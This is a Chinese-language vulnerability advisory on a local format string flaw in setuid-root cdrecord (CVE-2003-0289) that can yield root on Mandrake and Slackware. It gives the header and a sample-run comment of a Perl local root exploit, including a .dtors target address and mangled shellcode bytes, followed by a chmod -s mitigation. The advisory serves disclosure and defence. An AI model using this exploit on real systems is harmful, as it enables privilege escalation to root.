Mandrake cdrecode本地格式串处理漏洞
发布日期:2003-05-13
更新日期:2003-05-16
受影响系统:Cdrecord Cdrecord
- Mandrake Linux 9.1
- Mandrake Linux 9.0
- Mandrake Linux 8.2
- Slackware Linux 8.1
描述:
CVE(CAN) ID:
CVE-2003-0289
cdrecord是一款CD刻录程序,使用在多种Linux系统中。
cdrecord对用户提供的参数缺少充分检查,本地攻击者可以利用这个漏洞进行格式串攻击,可能以root用户权限在系统上执行任意指令。
cdrecord在mandrake系统上默认以setuid root属性安装,攻击者构建恶意格式字符串作为参数提交给cdrecord,可导致破坏cdrecord进程内存结构,精心构建参数可能以root用户权限在系统上执行任意指令。
<*来源:yjm01 (
yjm01@terra.com.br)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105286031812533&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
yjm01 (
yjm01@terra.com.br)提供了如下测试方法:
#!/usr/bin/perl
###########################################################
#Priv8security.com Cdrecord version 2.0 and < local root exploit.
#
# Version 1.10 is NOT VULN!!!!
#
# [wsxz@localhost buffer]$ perl priv8cdr.pl 4
# Using target number 4
# Using Mr .dtors 0x808c82c
# Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002
J鰎g Schilling
# scsidev: '1?郯?圬?碗^1繤F
# ?# 骎
#
?圬@丸?
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* chmod -s /usr/bin/cdrecord
厂商补丁:
Cdrecord
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html浏览次数:3022
严重程度:0(网友投票)